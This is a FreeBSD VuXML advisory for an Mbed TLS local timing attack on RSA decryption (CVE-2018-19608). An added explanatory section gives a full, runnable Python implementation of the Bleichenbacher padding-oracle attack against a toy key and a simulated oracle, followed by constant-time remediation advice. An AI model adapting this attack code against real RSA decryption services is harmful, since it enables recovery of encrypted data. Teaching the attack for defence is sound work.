FreeBSD VuXML: Documenting security issues in FreeBSD and the FreeBSD Ports Collection

Mbed TLS -- Local timing attack on RSA decryption

Affected packages
mbedtls < 2.14.1

Details

VuXML ID 293f40a0-ffa1-11e8-b258-0011d823eebd
Discovery 2018-11-28
Entry 2018-12-14

Janos Follath reports:

An attacker who can run code on the same machine that is performing an RSA decryption can potentially recover the plaintext through a Bleichenbacher-like oracle.
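
To make the quoted attack concrete, the following is an added example (not code from Mbed TLS, the advisory, or the FreeBSD port) of the Bleichenbacher adaptive chosen-ciphertext attack against a PKCS#1 v1.5 padding oracle. It assumes a constructed toy 128-bit RSA key and a simulated oracle that returns directly the one bit a timing side channel would leak, namely whether the decrypted block begins with 00 02. The actual leaky code path in Mbed TLS, how the timing difference is measured from a co-located process, and the query counts a real attack needs are not described on this page and are not modelled here.

```python
"""Bleichenbacher adaptive chosen-ciphertext attack on a PKCS#1 v1.5 padding oracle.
Added example with a constructed toy RSA key and simulated oracle; not Mbed TLS code."""
import itertools
import random

def is_probable_prime(n, rng, rounds=20):
    """Miller-Rabin probabilistic primality test (enough for a toy key)."""
    if n < 4 or n % 2 == 0:
        return n in (2, 3)
    d, r = n - 1, 0
    while d % 2 == 0:
        d, r = d // 2, r + 1
    for _ in range(rounds):
        x = pow(rng.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True

def gen_rsa(bits, rng, e=65537):
    """Toy RSA key; `bits` is deliberately tiny so the attack runs in seconds."""
    half = bits // 2
    while True:
        p, q = (rng.getrandbits(half) | (1 << (half - 1)) | 1 for _ in range(2))
        if p == q or not (is_probable_prime(p, rng) and is_probable_prime(q, rng)):
            continue
        n, phi = p * q, (p - 1) * (q - 1)
        if n.bit_length() == bits and phi % e:       # e is prime, so this is gcd(e, phi) == 1
            return n, e, pow(e, -1, phi)

def pkcs1_v15_pad(msg, k, rng):
    """EME-PKCS1-v1_5 type 2 block: 00 02 | >= 8 non-zero random bytes | 00 | msg."""
    ps = bytes(rng.randrange(1, 256) for _ in range(k - 3 - len(msg)))
    assert len(ps) >= 8, "message too long for this key size"
    return b"\x00\x02" + ps + b"\x00" + msg

def make_padding_oracle(n, d, k):
    """Simulated leaky decryptor: one bit per query, whether the decrypted block
    starts with 00 02.  In vulnerable code that bit leaks via timing; here it is returned."""
    def oracle(c):
        return pow(c, d, n).to_bytes(k, "big")[:2] == b"\x00\x02"
    return oracle

def bleichenbacher(c, n, e, k, oracle):
    """Recover m = c^d mod n from conforming c via the oracle alone; returns (m, #queries)."""
    B = 1 << (8 * (k - 2))                           # 00 02 prefix  <=>  2B <= m < 3B
    cdiv = lambda a, b: -(-a // b)                   # ceiling division
    queries = 0
    def conforming(s):                               # is (s*m) mod n PKCS-conforming?
        nonlocal queries
        queries += 1
        return oracle(c * pow(s, e, n) % n)          # built from the public key only
    M = [(2 * B, 3 * B - 1)]                         # c already conforms: blinding step skipped
    s = next(filter(conforming, itertools.count(cdiv(n, 3 * B))))   # step 2a
    while True:
        cand = []                                    # step 3: intersect each interval with [2B,3B)
        for a, b in M:
            for r in range(cdiv(a * s - 3 * B + 1, n), (b * s - 2 * B) // n + 1):
                lo, hi = max(a, cdiv(2 * B + r * n, s)), min(b, (3 * B - 1 + r * n) // s)
                if lo <= hi:
                    cand.append((lo, hi))
        M = []
        for lo, hi in sorted(cand):                  # merge overlapping/adjacent intervals
            if M and lo <= M[-1][1] + 1:
                M[-1] = (M[-1][0], max(M[-1][1], hi))
            else:
                M.append((lo, hi))
        if len(M) == 1 and M[0][0] == M[0][1]:
            return M[0][0], queries                  # step 4: interval collapsed onto m
        if len(M) > 1:                               # step 2b: several intervals left
            s = next(filter(conforming, itertools.count(s + 1)))
            continue
        a, b = M[0]                                  # step 2c: one interval, jump s via r
        r = cdiv(2 * (b * s - 2 * B), n)
        while True:
            lo, hi = cdiv(2 * B + r * n, b), (3 * B - 1 + r * n) // a
            hit = next(filter(conforming, range(lo, hi + 1)), None)
            if hit is not None:
                s = hit
                break
            r += 1

def demo(msg=b"hello", seed=2018):
    """Encrypt msg under a toy 128-bit key, then recover it through the oracle alone."""
    rng = random.Random(seed)                        # seeded so the run is reproducible
    n, e, d = gen_rsa(128, rng)
    k = (n.bit_length() + 7) // 8
    c = pow(int.from_bytes(pkcs1_v15_pad(msg, k, rng), "big"), e, n)
    m, queries = bleichenbacher(c, n, e, k, make_padding_oracle(n, d, k))
    block = m.to_bytes(k, "big")
    return block[block.index(b"\x00", 2) + 1:], queries   # strip 00 02 | PS | 00

if __name__ == "__main__":
    print(demo())
```

Running demo() recovers the test message using nothing but the public key, the ciphertext and that single yes/no answer per query; the attacker never sees a decryption result. The oracle here is the weakest form (only the first two bytes are checked), and with realistic key sizes the same loop needs on the order of a million queries, which is why local co-location matters for a timing variant. The usual remedy for this class of bug is to make the padding check take the same time, and follow the same memory-access pattern, whether or not the padding is valid, so that no per-query bit is available to begin with.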

References

CVE Name CVE-2018-19608
URL https://tls.mbed.org/tech-updates/security-advisories/mbedtls-security-advisory-2018-03